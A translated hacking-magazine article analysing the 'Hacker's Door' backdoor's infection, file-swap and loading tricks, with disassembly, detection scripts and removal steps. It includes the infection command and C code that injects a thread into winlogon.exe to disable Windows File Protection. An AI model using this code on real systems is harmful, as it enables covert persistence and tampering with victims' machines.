The Charm of Hacker's Door: Infection and Loading (vulnerability alert, Black Bar Security Net)

ID MYHACK58:62200613211
Type myhack58
Reporter Anonymous
Modified 2006-12-10T00:00:00


Article source: wind blue Chi

For readers: hacker enthusiasts, intrusion enthusiasts, hobbyists

Prerequisite knowledge: the basic functions of Hacker's Door

Butterfly: The key to learning hacking techniques lies in continually studying advanced technology and continually creating new things; only then can one keep a place of one's own amid the rapid development of network technology. Which black-hat tools have drawn attention recently? Hacker's Door is probably the one most people are watching, because it is so powerful: not only is it a strong backdoor in terms of function, it also contains many relatively novel ideas that are worth everyone's study. The author of this article gained a great deal from writing his own programs and analysing the Hacker's Door code, and so wrote this article. In a spirit of learning, it analyses the programming tricks of this hacker tool from a technical angle and shares them with you. Not bad, not bad!

The Charm of Hacker's Door: Infection and Loading

Recently I have taken a strong interest in backdoors. While discussing them with experts on the Internet, someone mentioned that "Hacker's Door" is very powerful and introduced it as one of the more successful backdoors, so I downloaded it from the Internet for study, hoping to learn the methods and techniques inside it. I dare not keep them to myself, so I share them here and hope the experts will offer their advice.

"Hacker's Door" description

Hacker's Door uses several of the current advanced backdoor technologies. It is only a DLL file; it starts itself by infecting system files, and the size and date of the infected system file do not change. At the same time it uses thread-insertion technology: it has no process of its own and opens no port of its own, but reuses any port that a system process has already opened, such as 80, 135, 139 or 445, so it is very well hidden, and penetrating the firewall is also very easy. This version has no file functions and only provides some very useful commands. No tool has yet been found that can detect this backdoor; search tools such as Fport, Llister and RKDetector are all ineffective.

Program self-start

Since it is a backdoor, it must start together with the system. According to the Hacker's Door introduction, it achieves self-start by infecting system program files. Since it infects system files like a virus, just look at the differences in a system file before and after infection! To test those differences, I prepared a file specifically to be infected, TestLoad.exe. It does nothing functional, just pops up a dialog box, which makes it convenient for testing; though small it is complete, and it saves a real system file from being used as the guinea pig. Then run the command:

C:\>rundll32 hkdoordll,DllRegisterServer TestLoad.exe 2

to have Hacker's Door infect TestLoad.exe. After infection, use the EXE viewing tool eXeScope to look at the differences in TestLoad.exe before and after infection.

Before infection, eXeScope displays the structure of TestLoad.exe as shown in Figure 1.

[Figure 1]

After infection the structure of TestLoad.exe is as shown in Figure 2.

[Figure 2]

As can be seen, after infection the import table of TestLoad.exe has an additional imported library, Hkdoordll.dll. Careful observation shows that the Import Table Address (ITA) of the infected TestLoad.exe has changed: the original ITA is 0x000043FC, and after infection it is 0x0000477E. To see what else in the file changed besides this, LordPE.exe is used here to compare the import-table functions of TestLoad.exe before and after infection; the comparison is shown in Figure 3.

[Figure 3]

Tip: to view an EXE file's import-table functions with LordPE.exe, click PE Editor, open the file, click Directories, and in the dialog that pops up click the three dots to the right of Import Table; this shows the executable's import table.

As can be seen, only a corresponding Hkdoordll.dll entry has been added to the linked list of the import table, so when the infected program is run again, the system's program loader searches for Hkdoordll.dll and maps it into the infected program's address space, and the backdoor is up and running. This self-start method of Hacker's Door is worth learning from; it is rather clever.
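As an added defensive illustration (not part of the original article or of Hacker's Door itself), the following Python walks a PE file's import directory and flags the Hkdoordll.dll entry the article found appended to TestLoad.exe; the sample images it checks are synthetic fixtures built inside the block, not real binaries, and the implant DLL name is the one the article reports.

```python
import struct

IMPLANT_DLL = "hkdoordll.dll"   # the import entry the article found added to TestLoad.exe

def _rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset via the section table."""
    for vaddr, vsize, rptr, rsize in sections:
        if vaddr <= rva < vaddr + max(vsize, rsize):
            return rva - vaddr + rptr
    raise ValueError("RVA %#x lies outside every section" % rva)

def imported_dlls(data):
    """Return the DLL names in a PE32/PE32+ image's import directory, in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]       # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]  # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = pe + 24                                          # start of the optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    # data directory starts at +96 (PE32) or +112 (PE32+); entry 1 is the import table
    imp_rva = struct.unpack_from("<I", data, opt + (96 if magic == 0x10B else 112) + 8)[0]
    raw = [struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8) for i in range(nsec)]
    sections = [(va, vs, rp, rs) for vs, va, rs, rp in raw]  # VirtualSize, VirtualAddress, RawSize, RawPtr
    names, off = [], (_rva_to_offset(sections, imp_rva) if imp_rva else None)
    while off is not None and any(struct.unpack_from("<IIIII", data, off)):  # zero descriptor ends table
        name_off = _rva_to_offset(sections, struct.unpack_from("<I", data, off + 12)[0])
        names.append(data[name_off:data.index(b"\0", name_off)].decode("ascii", "replace"))
        off += 20                                          # sizeof(IMAGE_IMPORT_DESCRIPTOR)
    return names

def infected_by_hkdoor(data):
    """True when the file carries the implant's import entry, whatever the letter case."""
    return any(n.lower() == IMPLANT_DLL for n in imported_dlls(data))

def build_test_pe(dll_names):
    """Synthetic PE32 fixture (not a real binary): one section holding only an import directory."""
    sec_rva, sec_raw, n = 0x1000, 0x200, len(dll_names)
    descs, names = b"", b""
    for name in dll_names:       # Name RVA points past the descriptors and the zero terminator
        descs += struct.pack("<IIIII", 0, 0, 0, sec_rva + 20 * (n + 1) + len(names), 0)
        names += name.encode("ascii") + b"\0"
    body = descs + b"\0" * 20 + names
    filehdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)   # i386, 1 section, PE32 opt hdr
    opt = (struct.pack("<H", 0x10B).ljust(104, b"\0")                    # magic ... up to data directory[1]
           + struct.pack("<II", sec_rva, 20 * (n + 1))).ljust(0xE0, b"\0")
    sect = b".idata\0\0" + struct.pack("<IIII", len(body), sec_rva, len(body), sec_raw) + b"\0" * 16
    hdr = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40) + b"PE\0\0" + filehdr + opt + sect
    return hdr.ljust(sec_raw, b"\0") + body

CLEAN_SAMPLE = build_test_pe(["KERNEL32.dll", "USER32.dll"])
INFECTED_SAMPLE = build_test_pe(["KERNEL32.dll", "USER32.dll", "Hkdoordll.dll"])
```

Running imported_dlls over every executable in a system directory and looking for the extra entry is the same comparison the article performs by hand with eXeScope and LordPE.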

Having figured out Hacker's Door's start-up mode, we can remove it manually. Here Hkdoordll.dll must not simply be deleted outright, as that may cause the system to crash: when the system loads an infected program (say Services.exe) and finds that Hkdoordll.dll is missing, Services.exe cannot be loaded, and if the infected program is a critical system process, the system will not start properly. To clean up, we can go to another machine running the same system with the same patches and find a Services.exe there, rename the infected program to Services2.exe, copy the clean Services.exe into the System32 folder, restart the PC, and then delete Hkdoordll.dll to remove Hacker's Door.

Runtime infection

The above covered Hacker's Door's self-start method; now let's look at how Hacker's Door infects a running system file. This had me puzzled for a very long time, and in the end I found that it uses a very flexible trick. We know that on a Windows system a running program file generally cannot be modified or deleted, which is why all sorts of self-deleting programs have appeared; self-deletion is not our focus here. However, careful users may have found that on Windows 2000 or Windows XP a running EXE file can be renamed or moved. So take the TestLoad.exe from before for a test and run:

C:\>rundll32 hkdoordll,DllRegisterServer TestLoad.exe 2

You will find a file TestLoad.exe.bak in the folder of TestLoad.exe. At first glance you might think "Hacker's Door" is being kind and automatically backing up system files for you; in fact this is the fox's tail of Hacker's Door. It is a last resort. Do not close TestLoad.exe, then try to delete TestLoad.exe and TestLoad.exe.bak. Did you notice the miracle? TestLoad.exe can be deleted, but TestLoad.exe.bak cannot. Doesn't that contradict what I just said? Not at all! Not at all! It proves exactly what was just said: Hacker's Door renames TestLoad.exe to TestLoad.exe.bak and then generates an infected TestLoad.exe, so the next time TestLoad.exe is run it is actually the replacement program that runs, and the original program has been set aside. Disassembling Hkdoordll.dll with IDA Pro, the following function calls can be found:

File rename:

.data:1000C618 lea ecx, [esp+438h+FileName]
.data:1000C61F lea edx, [esp+438h+var_324]
.data:1000C626 push ecx
.data:1000C627 push edx
.data:1000C628 call rename

Copy files:

.data:1000C66F lea edx, [esp+440h+var_32C]
.data:1000C676 push 0                        ; bFailIfExists
.data:1000C678 lea eax, [esp+444h+var_228]
.data:1000C67F push edx                      ; lpNewFileName
.data:1000C680 push eax                      ; lpExistingFileName
.data:1000C681 call CopyFileA

Move file:

.data:1000C795 mov eax, [ebp+8]
.data:1000C798 test eax, eax
.data:1000C79A jnz short loc_1000C7FE
.data:1000C79C lea ecx, [esp+448h+var_334]
.data:1000C7A3 push 5                        ; dwFlags
.data:1000C7A5 lea edx, [esp+44Ch+var_230]
.data:1000C7AC push ecx                      ; lpNewFileName
.data:1000C7AD push edx                      ; lpExistingFileName
.data:1000C7AE call MoveFileExA

The call above can actually be understood as:

MoveFileEx("TestLoad.exe", "TestLoad.exe.bak", MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING);

Tip: MSDN explains the MoveFileEx() function as follows:

BOOL MoveFileEx(
    LPCTSTR lpExistingFileName,  // pointer to the name of the existing file
    LPCTSTR lpNewFileName,       // pointer to the new name for the file
    DWORD dwFlags                // flag that specifies how to move the file
);

During this process the file image of TestLoad.exe is actually TestLoad.exe.bak; Hkdoordll.dll then generates the infected TestLoad.exe and saves it in the original file path.
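A delayed MoveFileEx of the kind shown above is queued by Windows in the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, which is where a responder can see such a pending replacement before the reboot carries it out. The Python below, added here and not part of the article or of Hacker's Door, decodes that value's source/destination pairs and triages the ones touching executables or .bak files; the sample value is constructed in the block to mirror the TestLoad.exe experiment, and the script reads nothing from a live registry.

```python
EXEC_SUFFIXES = (".exe", ".dll", ".sys")

def encode_multi_sz(strings):
    """Constructed-fixture helper: lay out Python strings as REG_MULTI_SZ bytes."""
    return ("\0".join(strings) + "\0\0").encode("utf-16-le")

def parse_pending_renames(multi_sz):
    """Decode a PendingFileRenameOperations value into (source, destination, replace) tuples.
    Entries come in pairs; an empty destination means 'delete at boot', and a leading '!'
    on the destination is how MOVEFILE_REPLACE_EXISTING is recorded."""
    text = multi_sz.decode("utf-16-le")
    if text.endswith("\0\0"):
        text = text[:-2]            # strip the list terminator but keep embedded empty strings
    strings = text.split("\0") if text else []
    if len(strings) % 2:
        raise ValueError("pending rename list is not made of source/destination pairs")
    ops = []
    for src, dst in zip(strings[::2], strings[1::2]):
        replace = dst.startswith("!")
        ops.append((src, dst[1:] if replace else dst, replace))
    return ops

def suspicious_pending_renames(multi_sz):
    """Heuristic triage: queued boot-time moves that touch executables or .bak copies."""
    hits = []
    for src, dst, replace in parse_pending_renames(multi_sz):
        low = (src + " " + dst).lower()
        if low.endswith(".bak") or any(s in low for s in EXEC_SUFFIXES):
            kind = "delete" if dst == "" else ("replace" if replace else "move")
            hits.append((src, dst, kind))
    return hits

# Constructed sample value mirroring the TestLoad.exe experiment (not captured from a real host)
SAMPLE_VALUE = encode_multi_sz([
    r"\??\C:\Windows\Temp\setup.log", "",                            # ordinary delete-at-boot entry
    r"\??\C:\Test\TestLoad.exe", r"!\??\C:\Test\TestLoad.exe.bak",   # delayed move that replaces an existing file
])
```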

Killing off System File Protection

Once the system starts, Windows loads the already-infected system program. But since "Hacker's Door" achieves self-start by infecting system programs, a different problem now arises.

Everyone knows that Windows 2000 and Windows XP have a System File Protection function: once a protected system file is modified, a dialog box pops up asking you to insert the system installation CD. This raises a question. TestLoad.exe is just an ordinary EXE file, not a system process protected by System File Protection; so when Hacker's Door modifies a real system process, why does the operating system's file protection not warn? For this, disassemble Hacker's Door again and observe how it turns off the System File Protection feature.

Find the following code:

.data:1000BBB0 LoadSFCDLL proc near          ; CODE XREF: sub_1000BC70+B7
.data:1000BBB0 push esi
.data:1000BBB1 xor esi, esi
.data:1000BBB3 call GetVersion               ; get the current version number of Windows
.data:1000BBB3                               ; and information about the operating system platform
.data:1000BBB9 cmp al, 5                     ; major version 5: Windows 2000 or Windows XP
.data:1000BBBB jnz short loc_1000BBDF
.data:1000BBBD xor ecx, ecx
.data:1000BBBF mov cl, ah                    ; minor version number
.data:1000BBC1 test cl, cl
.data:1000BBC3 jnz short loc_1000BBD2
.data:1000BBC5 push offset aSfc_dll          ; lpLibFileName; minor version 0: Windows 2000
.data:1000BBCA call LoadLibraryA             ; load Sfc.dll
.data:1000BBD0 pop esi
.data:1000BBD1 retn
.data:1000BBD2 loc_1000BBD2:                 ; CODE XREF: LoadSFCDLL+13 j
.data:1000BBD2 push offset aSfc_os_dll       ; lpLibFileName; minor version 1: Windows XP
.data:1000BBD7 call LoadLibraryA             ; load Sfc_os.dll
.data:1000BBDD pop esi
.data:1000BBDE retn

From the code above, Hkdoordll.dll loads Sfc.dll or Sfc_os.dll depending on the operating system version: if it is Windows 2000, that is Windows NT 5.0, it loads Sfc.dll; if it is Windows XP, that is Windows NT 5.1, it loads Sfc_os.dll. Look at the following section of disassembly:

.data:1000BC70 sub esp, 228h
.data:1000BC76 lea eax, [esp+228h+hObject]
.data:1000BC7A push ebx
.data:1000BC7B push esi
.data:1000BC7C push edi
.data:1000BC7D push offset aWinlogon_exe      ; "winlogon.exe"
.data:1000BC82 push 0
.data:1000BC84 push offset aDS               ; "%d/%s"
.data:1000BC89 push 1Fh
.data:1000BC8B mov edi, ecx
.data:1000BC8D push eax
.data:1000BC8E call sub_10008C60
.data:1000BC93 add esp, 14h
.data:1000BC96 lea ecx, [esp+234h+hObject]
.data:1000BC9A push ecx                      ; lpMultiByteStr
.data:1000BC9B call sub_100016CC             ; this sub-function is used to obtain the process ID
.data:1000BCA0 cmp eax, 0FFFFFFFDh
.data:1000BCA3 jb short loc_1000BCDB
.data:1000BCA5 push offset aCanTGetWinlogo   ; "Can't get the winlogon process id!\r\n"

The function above is used to get the process ID of Winlogon.exe, so that it can then be opened and code injected into it:

.data:1000BCDB push eax                      ; dwProcessId
.data:1000BCDC push 0                        ; bInheritHandle
.data:1000BCDE push 1F0FFFh                  ; dwDesiredAccess
.data:1000BCE3 call OpenProcess              ; open the target process
.data:1000BCE9 mov ebx, eax
.data:1000BCEB test ebx, ebx
.data:1000BCED jnz short loc_1000BD25

The disassembled snippet above calls the OpenProcess() function to open the Winlogon.exe process. Continuing to observe the disassembly, the following section is found:

.data:1000BD25 mov ecx, edi
.data:1000BD27 call LoadSFCDLL
.data:1000BD2C mov esi, eax
.data:1000BD2E test esi, esi
.data:1000BD30 jnz short loc_1000BD6F
.data:1000BD6F push 2                        ; function ordinal 2
.data:1000BD71 push esi                      ; hModule of Sfc.dll
.data:1000BD72 call GetProcAddress           ; get the address of the function with ordinal 2 in Sfc.dll
.data:1000BD78 test eax, eax
.data:1000BD7A mov [edi+10h], eax
.data:1000BD7D jnz short loc_1000BDC3

It can be seen that the assembly code above is used to obtain the address of the function with ordinal 2 in the previously loaded Sfc.dll (or Sfc_os.dll). The program then jumps to loc_1000BDC3; continuing to trace the disassembly, the following section is found:

.data:1000BDC3 push eax                      ; the Sfc.dll function address just obtained
.data:1000BDC4 push ebx                      ; Winlogon.exe process handle
.data:1000BDC5 mov ecx, edi
.data:1000BDC7 call sub_1000BBF0             ; note the call to sub_1000BBF0 here
.data:1000BDCC push esi                      ; hLibModule
.data:1000BDCD mov edi, eax
.data:1000BDCF call FreeLibrary
.data:1000BDD5 test edi, edi
.data:1000BDD7 push ebx                      ; hObject

Follow the sub_1000BBF0 function. Its entry parameters are the process handle and the thread start address:

.data:1000BBF0 sub_1000BBF0 proc near        ; CODE XREF: sub_1000BC70+157 p
.data:1000BBF0
.data:1000BBF0 ThreadId = dword ptr -1
.data:1000BBF0 hProcess = dword ptr 7
.data:1000BBF0 lpStartAddress = dword ptr 0Bh
.data:1000BBF0
.data:1000BBF0 push ecx
.data:1000BBF1 mov ecx, [esp+1+lpStartAddress]
.data:1000BBF5 mov edx, [esp+1+hProcess]
.data:1000BBF9 lea eax, [esp+1+ThreadId]
.data:1000BBFD push esi
.data:1000BBFE push eax                      ; lpThreadId
.data:1000BBFF push 0                        ; dwCreationFlags
.data:1000BC01 push 0                        ; lpParameter
.data:1000BC03 push ecx                      ; address of the second function in Sfc.dll
.data:1000BC04 push 0                        ; dwStackSize
.data:1000BC06 push 0                        ; lpThreadAttributes
.data:1000BC08 push edx                      ; handle of the Winlogon.exe process opened earlier
.data:1000BC09 mov [esp+21h+ThreadId], 0
.data:1000BC11 call CreateRemoteThread       ; create a remote thread
.data:1000BC17 mov esi, eax
.data:1000BC19 test esi, esi                 ; esi holds the handle of the newly created thread
.data:1000BC1B jnz short loc_1000BC3F

.data:1000BC3F
.data:1000BC3F loc_1000BC3F:                 ; CODE XREF: sub_1000BBF0+2B j
.data:1000BC3F push 0FA0h                    ; dwMilliseconds
.data:1000BC44 push esi                      ; the newly created thread handle
.data:1000BC45 call WaitForSingleObject      ; wait for the remote thread to end
.data:1000BC4B test eax, eax
.data:1000BC4D jz short loc_1000BC5D

.data:1000BC5D
.data:1000BC5D loc_1000BC5D:                 ; CODE XREF: sub_1000BBF0+5D j
.data:1000BC5D push esi                      ; hObject
.data:1000BC5E call CloseHandle
.data:1000BC64 mov eax, [esp+5+ThreadId]
.data:1000BC68 pop esi
.data:1000BC69 pop ecx
.data:1000BC6A retn 8
.data:1000BC6A sub_1000BBF0 endp

The purpose of the sub-function above is very simple: create a new thread in the just-opened Winlogon.exe process, and have that new thread call the exported function with ordinal 2 in Sfc.dll, which turns off the system's file self-protection.

In fact, according to Bgate's article on silently replacing system files on Windows 2000/XP, in Windows 2000 (and XP) the code that implements System File Protection lives in Sfc.dll (Sfc_os.dll on XP), and this DLL is called by Winlogon.exe. Winlogon.exe mainly calls two functions in Sfc.dll to implement System File Protection: at system start-up it calls one exported function of Sfc.dll to create a series of events, and at the end it calls another function to close that series of events, which shuts the System File Protection function down. So we only need to inject code into Winlogon.exe that calls the "second" function to cancel file protection; "Hacker's Door" uses exactly this method.

Note here that to inject into the Winlogon.exe process, the program needs to raise its own privileges to include the debug privilege.

HANDLE hToken;
LUID DebugNameValue;
TOKEN_PRIVILEGES Privileges;
DWORD dwRet;

OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, "SeDebugPrivilege", &DebugNameValue);
Privileges.PrivilegeCount = 1;
Privileges.Privileges[0].Luid = DebugNameValue;
Privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &Privileges, sizeof(Privileges), NULL, &dwRet);
CloseHandle(hToken);

The whole procedure above for turning off System File Protection, written in C, is as follows:

/* Get the process ID; this can be done with CreateToolhelp32Snapshot(),
   Process32First() and Process32Next(). The helper is only declared here,
   as in the original listing, and is not implemented. */
DWORD GetProcessIdFromName(const char *name);

DWORD dwPid = GetProcessIdFromName("Winlogon.exe");
/* 1F0FFFh in the disassembly above is PROCESS_ALL_ACCESS */
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
DWORD dwVersion;
HMODULE hSfc = NULL;

dwVersion = GetVersion();
/* Determine the operating system type */
if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5) {              /* Windows 2000/XP */
    if ((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0)            /* Windows 2000 */
        hSfc = LoadLibrary("sfc.dll");
    else if ((DWORD)(HIBYTE(LOWORD(dwVersion))) == 1)       /* Windows XP */
        hSfc = LoadLibrary("sfc_os.dll");
}
/* Get the address of the function with ordinal 2 */
FARPROC dwAddress = GetProcAddress(hSfc, MAKEINTRESOURCE(2));
DWORD dwThreadId;
HANDLE hThread;
/* Create the remote thread */
hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)dwAddress, 0, 0, &dwThreadId);
WaitForSingleObject(hThread, 0x0FA0);


That roughly completes the analysis. When I first got hold of Hacker's Door I kept wondering how on earth it infects a running system file. I originally thought it modified the process's handle so that it pointed at the replacement, and for that reason I read a lot of documentation. It was by disassembling and studying the program that I gradually discovered Hacker's Door's programming tricks. Here I would also like to thank the author of "Hacker's Door" for not packing it, so that we were fortunate enough to see what this excellent hacker tool looks like! Where I fall short, advice is welcome; mail to: fengcaho@163.com. (The programs involved in the text are included on the magazine's companion disc in the "Magazine" column and can be looked up by article name.)